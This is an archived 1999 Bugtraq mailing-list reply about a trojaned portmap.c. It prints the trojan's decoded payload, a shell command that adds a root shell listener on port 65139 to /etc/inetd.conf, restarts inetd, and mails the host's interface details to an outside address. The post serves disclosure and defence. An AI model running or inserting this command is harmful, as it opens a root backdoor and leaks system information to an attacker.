[11487] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: portmap.c Trojan

daemon@ATHENA.MIT.EDU (Wakko Ellington Warner-Warner III)
Sun Aug 22 20:26:55 1999

Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id:  <Pine.LNX.4.02.9908212119250.3799-100000@wakko.bitey.net>
Date:         Sat, 21 Aug 1999 21:20:55 -0400
Reply-To: Wakko Ellington Warner-Warner III <wakko@WTOWER.COM>
From: Wakko Ellington Warner-Warner III <wakko@WTOWER.COM>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <Pine.LNX.4.10.9908201217190.31229-200000@4thdimension.net>

On Fri, 20 Aug 1999, goatkiller wrote:

The actual "shellcode" that gets executed follows:

/bin/echo "65139 stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf
; /bin/killall -1 inetd 2>&1 1>/dev/null ; /sbin/ifconfig -a | mail
goat187@hotmail.com 2>&1 2>/dev/null

- A.P.

--

+------------------------------------------+------------------+
| "We are a great software company. That's | NIC: AP5514   16 |
| the only image anyone should have of     | http://bitey.net |
| us." -- Bill Gates                       | wakko@bitey.net  |
+------------------------------------------+------------------+


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[11487] in bugtraq

Re: portmap.c Trojan

daemon@ATHENA.MIT.EDU (Wakko Ellington Warner-Warner III)Sun Aug 22 20:26:55 1999

daemon@ATHENA.MIT.EDU (Wakko Ellington Warner-Warner III)
Sun Aug 22 20:26:55 1999